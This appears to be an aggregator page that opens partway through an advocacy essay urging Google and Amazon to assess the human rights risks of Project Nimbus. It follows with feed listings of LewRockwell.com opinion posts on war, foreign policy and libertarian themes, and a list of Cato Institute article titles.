    Despite those warnings, and the multiple reports since then about human rights abuses by the very portions of the Israeli government that use Google’s and Amazon’s services, the companies continue to operate business as usual. It seems that they have taken the position that they do not need to change course or even publicly explain themselves unless the media or other external organizations present definitive proof that their tools have been used in specific violations of international human rights or humanitarian law. While that conclusive public evidence has not yet emerged for all the companies, the risks are obvious, and they are aware of them. Instead of conducting robust, transparent human rights due diligence, Amazon and Google are continually choosing to look the other way. Google’s own internal assessments undermine its public posture. According to reporting, Google’s lawyers and policy staff warned that Google Cloud services could be linked to the facilitation of human rights abuses. In the same report, Google employees also raised concerns that the company’s cloud and AI tools could be used for surveillance or other militarized purposes, which seems very likely given the Israeli government’s long-standing reliance on advanced data-driven systems to control and monitor Palestinians. Google has publicly claimed that Project Nimbus is “not directed at highly sensitive, classified, or military workloads” and is governed by its standard Acceptable Use Policies. Yet reporting has revealed conflicting representations about the contract’s terms, including indications that the Israeli government may be permitted to use any services offered in Google’s cloud catalog for any purpose. Google has declined to publicly resolve these contradictions, and its lack of transparency is problematic. The gap between what Google says publicly and what it knows internally should alarm anyone who hopes to take the company’s human rights commitments seriously. 
Google’s and Amazon’s AI Principles Require Proactive Action Even after being revised last year, Google’s AI Principles continue to commit the company to responsible development and deployment of its technologies, including implementing appropriate human oversight, due diligence, and safeguards to mitigate harmful outcomes and align with widely accepted principles of international law and human rights. While the updated principles no longer explicitly commit Google to avoiding entire categories of harmful use, they still require the company to assess foreseeable risks, employ rigorous monitoring and mitigation measures, and act responsibly throughout the full lifecycle of AI development and deployment. Amazon has similarly committed to responsible AI practices through its Responsible AI framework for AWS services. The company states that it aims to integrate responsible AI considerations across the full lifecycle of AI design, development and operation, emphasizing safeguards such as fairness, explainability, privacy and security, safety, transparency, and governance. Amazon also says its AI services are designed with mechanisms for monitoring, and risk mitigation to help prevent harmful outputs or misuse and to enable responsible deployment across a range of use cases. Google and Amazon have the knowledge, the leverage, and the responsibility to act now. Choosing not to is still a choice. Here, the risks are neither speculative nor remote. They are foreseeable, well-documented, and exacerbated by the context in which Project Nimbus operates, which is an ongoing military campaign marked by widespread civilian harm and credible allegations of grave human rights violations including genocide. In such circumstances, waiting for definitive proof is not responsible risk management, it is willful blindness. Modern cloud and AI systems are designed to be flexible, customizable, and deployable at scale, often beyond the vendor’s direct visibility. 
That reality is precisely why human rights due diligence must be proactive. Waiting for a leaked document or whistleblower account demonstrating direct misuse, as occurred in Microsoft’s case, means waiting until harm has already been done. Microsoft’s Experience Should Have Been Warning Enough As noted above, the recent revelations about Microsoft’s technologies being misused in violation of Microsoft’s commitments by the Israeli military illustrate the dangers of this wait-and-see approach. Google and Amazon should not need a similar incident to recognize what is at stake. The demonstrated misuse of comparable technologies, combined with Google’s and Amazon’s own knowledge of the risks associated with Project Nimbus, should already be sufficient to trigger action. The appropriate response is to act responsibly and proactively. Google and Amazon should immediately: Conduct and publish an independent human rights impact assessment of Project Nimbus. Disclose how they evaluate, monitor, and enforce compliance with their AI Principles in high-risk government contracts, including and especially in Project Nimbus. Commit to suspending or restricting services where there is a credible risk of serious human rights harm, even if definitive proof of misuse has not yet emerged. Waiting Is a Choice, and Not One That Protects Human Rights Google and Amazon publicly emphasize their commitment to responsible AI and respect for human rights. Those commitments are meaningless if they apply only once harm is undeniable and irreversible. In conflict settings, especially where secrecy and information asymmetry are the norm, companies must act on credible risk, not perfect evidence. Google and Amazon have the knowledge, the leverage, and the responsibility to act now. Choosing not to is still a choice, and one that carries real consequences for people whose lives are already at risk.

  • Ron Paul: Still The Voice of Reason
    by Charles Burris on March 31, 2026 at 11:36 pm

    The true heroic voice of reason concerning the past and present disastrous adventurism such as the Afghanistan quagmire is certainly not war criminals George W. Bush, Dick and Liz Cheney, Bill and Hillary Clinton, Barack Obama, and Joe Biden. It is 2012 presidential candidate Ron Paul. He remains the voice of clarity directing his Ron The post Ron Paul: Still The Voice of Reason appeared first on LewRockwell.

  • New York Times: ’13 U.S. Bases Uninhabitable’ — We Could’ve Just Marched Home
    by Daniel McAdams on March 27, 2026 at 4:34 pm

    For decades, Ron Paul has called for closing all foreign U.S. bases and bringing all of our troops home. “We just marched in. We should just march out.” But alas, this “America First” policy recommendation was ignored. Perpetual war was too engrained in the government and their special interest benefactors. Now, what should have been The post New York Times: ’13 U.S. Bases Uninhabitable’ — We Could’ve Just Marched Home appeared first on LewRockwell.

  • War Isn’t Free … How The American People Pay Dearly For It
    by Daniel McAdams on March 20, 2026 at 4:35 pm

    Just because we don’t get invoices in the mail, doesn’t mean we don’t pay dearly for the empire’s senseless wars. Most of us Americans have been hammered our entire lives to pay for them. It was hoped that the long-train of disasters was coming to an end with the second Trump Administration. But alas, it The post War Isn’t Free … How The American People Pay Dearly For It appeared first on LewRockwell.

  • Trump & Netanyahu: Who’s the boss? Maybe we’ll find out
    by Daniel McAdams on March 19, 2026 at 4:38 pm

    Israeli Prime Minister Benjamin Netanyahu made many trips to the U.S. last year. And now here we are, in the middle of a gigantic mess in the Middle East (again). The widely anticipated expectation of President Trump putting “America First” and “Making America Great Again” seem like fleeting memories now. The post Trump & Netanyahu: Who’s the boss? Maybe we’ll find out appeared first on LewRockwell.

  • Trump vs. NATO — Would He Actually Leave?
    by Daniel McAdams on March 18, 2026 at 4:45 pm

    NATO should have been disbanded when the Warsaw Pact was disbanded in 1991. Its continuance has been a drain on the American people ever since. But the Empire, despite its protestations, gains many benefits from keeping NATO around. NATO is one of the primary ways that the Empire maintains great “influence” over Europe. So will The post Trump vs. NATO — Would He Actually Leave? appeared first on LewRockwell.

  • Counting The Costs: Another War Is Not What America Needed
    by Daniel McAdams on March 6, 2026 at 5:44 pm

    It’s not hyperbole to say that America is broken; badly broken. The hope that Donald Trump would put America on the right path has also been broken. Yet another Middle East war is the very last thing that our nation needed. With each passing moment, the costs are mounting. How much can the American people, The post Counting The Costs: Another War Is Not What America Needed appeared first on LewRockwell.

  • Should Libertarians Celebrate “Operation Epic Fury”?
    by Thomas DiLorenzo on March 3, 2026 at 11:22 pm

    That of course is the idiotic name the neocons have given to their latest invasion of a Middle East country by the U.S./Israeli armies. Javier Milei immediately joined with his fellow Zionist neocons to “celebrate” the invasion. Those of us who knew Murray Rothbard can just hear him shouting that Milei’s “celebration” is “Monstrous!” Milei The post Should Libertarians Celebrate “Operation Epic Fury”? appeared first on LewRockwell.

  • Tucker on Operation Epstein Fury
    by Dale Steinreich on March 2, 2026 at 9:16 pm

    Israel’s war and what it means. pic.twitter.com/P9D7UGq40W — Tucker Carlson (@TuckerCarlson) March 2, 2026 The post Tucker on Operation Epstein Fury appeared first on LewRockwell.

  • Rothbard at 100
    by Thomas DiLorenzo on March 2, 2026 at 12:03 pm

    Today, March 2, would have been Murray Rothbard’s 100th birthday. Rothbard’s intellectual heir, Hans-Hermann Hoppe, has published on his Property and Freedom Society Web site a tribute to his mentor that includes twenty new essays and much more. Hans is widely regarded all over the world as Rothbard’s most important intellectual heir and his closest The post Rothbard at 100 appeared first on LewRockwell.

  • US Citizen Executed by Israeli Settlers as Israel Aims to Further Control the West Bank
    by Joshua Shoenfeld on February 24, 2026 at 2:01 am

    Nasrallah Abu Siyam, a 19-year-old Palestinian-American man, was executed by illegal Israeli settlers in the West Bank on Wednesday.  Abu Siyam was among about 30 residents of Mukhmas who were trying to stop armed illegal settlers from stealing their goats.  Israeli settlers shot at least three of the villagers, including Abu Siyam. The US State The post US Citizen Executed by Israeli Settlers as Israel Aims to Further Control the West Bank appeared first on LewRockwell.

  • Epstein Files Are Just The Beginning… W/Robert Barnes
    by Charles Burris on February 18, 2026 at 7:16 pm

    The post Epstein Files Are Just The Beginning… W/Robert Barnes appeared first on LewRockwell.

  • China Buys Gold & Dumps Dollars
    by Daniel McAdams on February 13, 2026 at 5:39 pm

    Gold has been universal international money for thousands of years for many reasons; primarily because no government can control or counterfeit it. Naturally, some governments hate these natural restrictions. They want to spend money without restraint; and want to counterfeit their way to world domination. Alas, the United States took the latter road after WWII. The post China Buys Gold & Dumps Dollars appeared first on LewRockwell.

  • Voluntary Multipolar Globalization vs. Tyrannical Unipolar Globalization
    by Daniel McAdams on February 6, 2026 at 5:33 pm

    “Globalization” has been a buzzword for many years. But there are two types, and the distinction is extremely important. There’s the globalization of America’s founding, as laid out by Thomas Jefferson: “Peace, commerce and honest friendship with all nations, entangling alliances with none.” And then there’s the modern globalization laid out by Paul Wolfowitz after The post Voluntary Multipolar Globalization vs. Tyrannical Unipolar Globalization appeared first on LewRockwell.

  • Does Congress Even Exist Anymore? Whose Fault Is This?
    by Daniel McAdams on January 23, 2026 at 5:32 pm

    We all grew up learning about the U.S. government’s supposed uniqueness; its built-in “checks and balances.” After all, the results of concentrated power without restraint are littered throughout all of human history. America was different…for a while, at least. Congress was, in theory, the branch of government “closest to the people,” representing each state’s interests. Today? The post Does Congress Even Exist Anymore? Whose Fault Is This? appeared first on LewRockwell.

  • Discover the Shocking Truth Behind World War II that Still Impacts the World Today
    by Charles Burris on January 18, 2026 at 7:08 pm

    HITLERS GOLD — THE REAL STORY, SWISS BANKS, THE BIS, DULLES AND THE AFTERMATH   Since the Second World War we have been talking of the horrors of war, the battles, tanks, the men and machines. But none of it could have happened if not for the international industrialists, bankers and law-firms and banking cartels. The post Discover the Shocking Truth Behind World War II that Still Impacts the World Today appeared first on LewRockwell.

  • Price Controls Don’t Work — Not Even For President Trump
    by Daniel McAdams on January 16, 2026 at 5:32 pm

    Basic economic logic and thousands of years of recorded history have verified that price controls take a bad economic circumstance and make it even worse. But alas, President Trump, who seems to be looking for a quick fix to pacify public anger for the results of his policies, is pushing for price controls. Whether it The post Price Controls Don’t Work — Not Even For President Trump appeared first on LewRockwell.

  • Why Neocons Like Marco Rubio and Lindsey Graham are Responsible for the Minnesota Welfare Fraud Scandal
    by Thomas DiLorenzo on January 15, 2026 at 8:57 pm

    From Murray Rothbard’s 1994 essay, “Just War”: “The Somalian intervention [by the U.S. military] was a perfect case study in the workings of [the] Wilsonian dream. We began the intervention by extolling a ‘new kind of army (a model army if you will, engaged in a new kind of high moral intervention: the U.S. soldier The post Why Neocons Like Marco Rubio and Lindsey Graham are Responsible for the Minnesota Welfare Fraud Scandal appeared first on LewRockwell.

  • The Duran: Regime Change Escalator w/ Robert Barnes
    by Charles Burris on January 13, 2026 at 4:11 pm

    Not only is Robert Barnes a master litigator and top-notch attorney but one of the most in depth, articulate, well read and street-smart experienced political analysts in the nation. Whether it involves the institutionalized criminal machine cartels of the Democrats and Republicans or the deep state, he is a true polymath reminiscent of Murray N. The post The Duran: Regime Change Escalator w/ Robert Barnes appeared first on LewRockwell.

  • The “Deep Politics” Reality of our Foreign Policy with the Third World since the end of World War II has been Narco-Centric, behind the Cold War/War on Terror Public Facade or Rationale
    by Charles Burris on January 10, 2026 at 5:19 pm

    Mike Benz — Riots, Revolution & A World on Fire This Week Mike Benz — CIA Cocaine Trade in Venezuela Complicates Maduro Charges Mike Benz chat with Grant Stinchfield tonight (1/8/26) on NewsMax Trump needs to wake up from the deep sleep slumber engendered by the deep state. For almost 100 years, the US has The post The “Deep Politics” Reality of our Foreign Policy with the Third World since the end of World War II has been Narco-Centric, behind the Cold War/War on Terror Public Facade or Rationale appeared first on LewRockwell.

  • The “Deep Politics” Reality of our Foreign Policy with the Third World since the end of World War II has been Narco-Centric, behind the Cold War/War on Terror Public Facade or Rationale
    by Charles Burris on January 10, 2026 at 3:16 pm

    Mike Benz — CIA Cocaine Trade In Venezuela Complicates Maduro Charges Mike Benz chat with Grant Stinchfield tonight (1/8/26) on NewsMax Trump needs to wake up from the deep sleep slumber engendered by the deep state. For almost 100 years, the US has had a narco-centric foreign policy. American War Machine: Deep Politics, the CIA The post The “Deep Politics” Reality of our Foreign Policy with the Third World since the end of World War II has been Narco-Centric, behind the Cold War/War on Terror Public Facade or Rationale appeared first on LewRockwell.

  • The “Deep Politics” Reality of our Foreign Policy with the Third World since the end of World War II has been Narco-Centric, behind the Cold War/War on Terror Public Facade or Rationale
    by Charles Burris on January 10, 2026 at 3:30 am

    Mike Benz — CIA Cocaine Trade In Venezuela Complicates Maduro Charges Mike Benz chat with Grant Stinchfield tonight (1/8/26) on NewsMax Trump needs to wake up from the deep sleep slumber engendered by the deep state. For almost 100 years, the US has had a narco-centric foreign policy. American War Machine: Deep Politics, the CIA The post The “Deep Politics” Reality of our Foreign Policy with the Third World since the end of World War II has been Narco-Centric, behind the Cold War/War on Terror Public Facade or Rationale appeared first on LewRockwell.

  • The “Deep Politics” Reality of our Foreign Policy with the Third World since the end of World War II has been Narco-Centric, behind the Cold War/War on Terror Public Facade or Rationale
    by Charles Burris on January 9, 2026 at 2:30 pm

    Mike Benz — CIA Cocaine Trade In Venezuela Complicates Maduro Charges Mike Benz chat with Grant Stinchfield tonight (1/8/26) on NewsMax Trump needs to wake up from the deep sleep slumber engendered by the deep state. For almost 100 years, the US has had a narco-centric foreign policy. American War Machine: Deep Politics, the CIA The post The “Deep Politics” Reality of our Foreign Policy with the Third World since the end of World War II has been Narco-Centric, behind the Cold War/War on Terror Public Facade or Rationale appeared first on LewRockwell.

  • Empire-Mania: Trump Wants $1.5 Trillion Military Budget
    by Daniel McAdams on January 8, 2026 at 5:34 pm

    Trump/Vance was presented as “the peace ticket,” and was voted in with the expectation of focusing on America instead of the rest of the world. But alas, the addiction to Empire has proven to be too strong once again. The Trump Administration has been laser-focused on foreign nations, while our own nation continues to struggle The post Empire-Mania: Trump Wants $1.5 Trillion Military Budget appeared first on LewRockwell.

  • Mike Benz – Venezuela: A Hard-Nosed Realist Analysis of What Really Went Down
    by Charles Burris on January 7, 2026 at 9:12 pm

    The post Mike Benz – Venezuela: A Hard-Nosed Realist Analysis of What Really Went Down appeared first on LewRockwell.

  • Mike Benz: CIA Cocaine Trafficking In Venezuela – This is Part 4 of our Going Going, Back Back to Venezuela Stream
    by Charles Burris on January 6, 2026 at 8:36 pm

    This is Part 4 of our Going Going, Back Back To Venezuela stream. Part 1 here: • Going Going, Back Back, To Venezuela Venez… Part 2 here: • Going Going, Back Back, To Venezuela Venez… Part 3 here: • Going Going, Back Back, To Venezuela Venez… The post Mike Benz: CIA Cocaine Trafficking In Venezuela – This is Part 4 of our Going Going, Back Back to Venezuela Stream appeared first on LewRockwell.

  • Get Educated: Robert Barnes on Venezuela, Executive Power, International Law, and US Policy
    by Charles Burris on January 6, 2026 at 11:34 am

    Robert Barnes joins Nick Rekieta to discuss the recent apprehension of Nicolas Maduro, the head of Venezuela. Is this legally sound, is it preferable? Let’s talk about it. The post Get Educated: Robert Barnes on Venezuela, Executive Power, International Law, and US Policy appeared first on LewRockwell.

  • Help Celebrate the 135th Birthday of the Great Zora Neale Hurston by Watching this PBS documentary Zora Neale Hurston: Claiming A Space. She was a Legendary Writer of the Old Right, along with Rose Wilder Lane, Ayn Rand, and Isabel Paterson
    by Charles Burris on January 3, 2026 at 3:02 pm

    Black Libertarian: The Story of Zora Neale Hurston, by Marcus Epstein Isabel Paterson, Rose Wilder Lane, and Zora Neale Hurston on War, Race, the State, and Liberty, by David T. Beito and Linda Royster Beito Here the tone is celebratory yet deeply probing. The Beitos’ exploration of the commonality of character and individualistic temperament of The post Help Celebrate the 135th Birthday of the Great Zora Neale Hurston by Watching this PBS documentary Zora Neale Hurston: Claiming A Space. She was a Legendary Writer of the Old Right, along with Rose Wilder Lane, Ayn Rand, and Isabel Paterson appeared first on LewRockwell.

  • MTV Music Channels Sign Off Forever with the One that Started it all: ‘Video Killed the Radio Star’
    by Charles Burris on January 1, 2026 at 8:44 pm

    MTV’s dedicated music channels, including MTV Music, MTV 80s, and MTV 90s, ended their 24/7 music broadcasts globally on December 31, 2025, concluding with The Buggles’ “Video Killed the Radio Star,” the same video that launched the channel in 1981, marking the end of an era as streaming and on-demand viewing shifted audience habits. While The post MTV Music Channels Sign Off Forever with the One that Started it all: ‘Video Killed the Radio Star’ appeared first on LewRockwell.

  • Infrastructure Investment: A State, Local, and Private Responsibility
    by Cato Institute on June 18, 2022 at 10:37 am

    Infrastructure Investment: A State, Local, and Private Responsibility

  • The Next “Crisis”: The Debt Ceiling
    by Cato Institute on June 18, 2022 at 3:05 am

    The Next “Crisis”: The Debt Ceiling

  • The Next “Crisis”: The Debt Ceiling
    by Cato Institute on June 18, 2022 at 3:05 am

    The Next “Crisis”: The Debt Ceiling

  • What the Second Amendment Permits
    by Cato Institute on June 18, 2022 at 3:05 am

    What the Second Amendment Permits

  • James M. Buchanan, RIP
    by Cato Institute on June 18, 2022 at 3:05 am

    James M. Buchanan, RIP

  • China, America, and the Pivot to Asia
    by Cato Institute on June 18, 2022 at 3:04 am

    China, America, and the Pivot to Asia

  • Economic Freedom of the States of India
    by Cato Institute on June 18, 2022 at 3:04 am

    Economic Freedom of the States of India

  • Why the Hagel Nomination Matters
    by Cato Institute on June 18, 2022 at 3:04 am

    Why the Hagel Nomination Matters

  • A Rational Response to the Privacy ‘Crisis’
    by Cato Institute on June 18, 2022 at 3:04 am

    A Rational Response to the Privacy ‘Crisis’

  • New Regulation Tackles ObamaCare, TSA Screening
    by Cato Institute on June 18, 2022 at 3:04 am

    New Regulation Tackles ObamaCare, TSA Screening

  • Should U.S. Fiscal Policy Address Slow Growth or the Debt?
    by Cato Institute on June 18, 2022 at 3:04 am

    Should U.S. Fiscal Policy Address Slow Growth or the Debt?

  • Grading the Fiscal Cliff Deal
    by Cato Institute on June 18, 2022 at 3:04 am

    Grading the Fiscal Cliff Deal

  • Make a Year-End Gift to Cato
    by Cato Institute on June 18, 2022 at 3:03 am

    Make a Year-End Gift to Cato

  • Advantages of Low Capital Gains Tax Rates
    by Cato Institute on June 18, 2022 at 3:03 am

    Advantages of Low Capital Gains Tax Rates

  • Happy Holidays from Cato
    by Cato Institute on June 18, 2022 at 3:03 am

    Happy Holidays from Cato

  • How Fossil Fuels Saved Humanity from Nature and Nature from Humanity
    by Cato Institute on June 18, 2022 at 3:03 am

    How Fossil Fuels Saved Humanity from Nature and Nature from Humanity

  • An Inexorable March to Legalization?
    by Cato Institute on June 18, 2022 at 2:43 am

    An Inexorable March to Legalization?

  • Military Spending Cuts No Reason to Compromise on Taxes
    by Cato Institute on June 18, 2022 at 2:43 am

    Military Spending Cuts No Reason to Compromise on Taxes

  • The Fire Next Door: Mexico’s Drug Violence and the Danger to America
    by Cato Institute on June 18, 2022 at 2:43 am

    The Fire Next Door: Mexico’s Drug Violence and the Danger to America

  • Has the Fed Been a Failure?
    by Cato Institute on June 18, 2022 at 2:43 am

    Has the Fed Been a Failure?

 

Lew Rockwell, EFF,